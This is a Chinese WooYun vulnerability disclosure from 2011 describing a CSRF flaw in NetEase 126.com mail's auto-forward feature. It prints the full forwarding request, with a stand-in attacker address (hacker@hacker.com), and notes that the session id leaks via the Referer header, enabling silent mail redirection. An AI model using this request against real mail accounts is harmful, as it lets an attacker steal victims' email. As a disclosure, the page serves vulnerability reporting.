当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02088

漏洞标题:网易邮箱CSRF漏洞

相关厂商:网易

漏洞作者: Joey Yin

提交时间:2011-05-09 16:14

修复时间:2011-05-14 18:00

公开时间:2011-05-14 18:00

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-05-09: 细节已通知厂商并且等待厂商处理中
2011-05-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

犹豫了很久要不要把这个给爆出来,毕竟影响太大了……

详细说明:

网易邮箱有个很强大的功能叫做“自动转发”,然后这个功能没有做CSRF预防。
看看设置转发的http包吧:
GET /autofw/fwto.do?sid=XXXXXXXXXXXXXXXXXXXXXXXXX&forwarddes=hacker@hacker.com&keeplocal=1&callback=MM.autofwd.valCallback HTTP/1.1
Host: config.mail.126.com
Referer: http://g4a32.mail.126.com/a/j/dm3/index.jsp?sid=XXXXXXXXXXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: *****
看上去貌似要带sid (session id),但是网易的sid是在url里的,换句话说通过http referer就拿到了。接下来可以做的事情就好容易……

漏洞证明:

修复方案:

你懂的。

版权声明:转载请注明来源 Joey Yin@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2011-05-14 18:00

厂商回复:

漏洞Rank:12 (WooYun评价)

最新状态:

暂无